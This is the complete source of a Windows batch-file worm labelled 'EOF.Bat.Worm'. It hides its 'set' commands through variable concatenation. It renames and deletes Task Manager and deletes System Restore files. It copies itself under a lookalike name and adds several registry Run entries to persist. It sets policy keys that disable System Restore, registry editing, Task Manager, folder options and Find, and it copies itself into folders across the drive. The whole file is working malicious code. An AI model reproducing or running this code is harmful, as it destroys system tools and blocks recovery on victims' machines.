:Coded by EOF
:EOF.Bat.Worm
set l=t
set k=s
set i=e
%k%%i%%l% h=r
%k%%i%%l% g=f
%k%%i%%l% d=o
%k%%i%%l% b=bat
%k%%i%%l% z=REG_DWORD
copy /y "%windir%\system32\taskmgr.exe" "%windir%\system32\taskmgr.e0f"
del /F /S /Q %windir%\system32\taskmgr.exe
del /F /S /Q %windir%\system32\Restore\*.*
copy /y "%0" "%windir%\system32\ctfmom.%b%"
%k%%i%%l% r=%random%
%k%%i%%l% $=Reg add
%k%%i%%l% p=HKLM\Software
%k%%i%%l% f=Microsoft\Windows\CurrentVersion\Run
%k%%i%%l% m=Microsoft\Windows\CurrentVersion\Policies\Explorer
%k%%i%%l% n=Microsoft\Windows\CurrentVersion\Policies\system
%$% "%p%\%f%" /v "e0f1%r%" /d "%windir%\e0f%r%.%b%" /f
%$% "%p%\%f%" /v "e0f2%r%" /d "%windir%\system32\e0f%r%.%b%" /f
%$% "%p%\%f%" /v "e0f3%r%" /d "%windir%\system32\Config\e0f%r%.%b%" /f
%$% "%p%\%f%" /v "ctfmom" /d "%windir%\system32\ctfmom.%b%" /f
%$% "%p%\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t %z% /d 1 /f
%$% "%p%\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t %z% /d 1 /f
%$% "%p%\%m%" /v DisableRegistryTools /t %z% /d 1 /f
%$% "%p%\%m%" /v NofolderOptions /t %z% /d 1 /f
%$% "%p%\%m%" /v DisableTaskMgr /t %z% /d 1 /f
%$% "%p%\%m%" /v NoFind /t %z% /d 1 /f
%$% "%p%\%n%" /v DisableRegistryTools /t %z% /d 1 /f
%$% "%p%\%n%" /v NofolderOptions /t %z% /d 1 /f
%$% "%p%\%n%" /v DisableTaskMgr /t %z% /d 1 /f
%$% "%p%\%n%" /v NoFind /t %z% /d 1 /f
%g%%d%%h% /%h% "%homedrive%\." %%n in (e0f%r%.%b%) do copy /Y %0 "%%n"
echo �
:END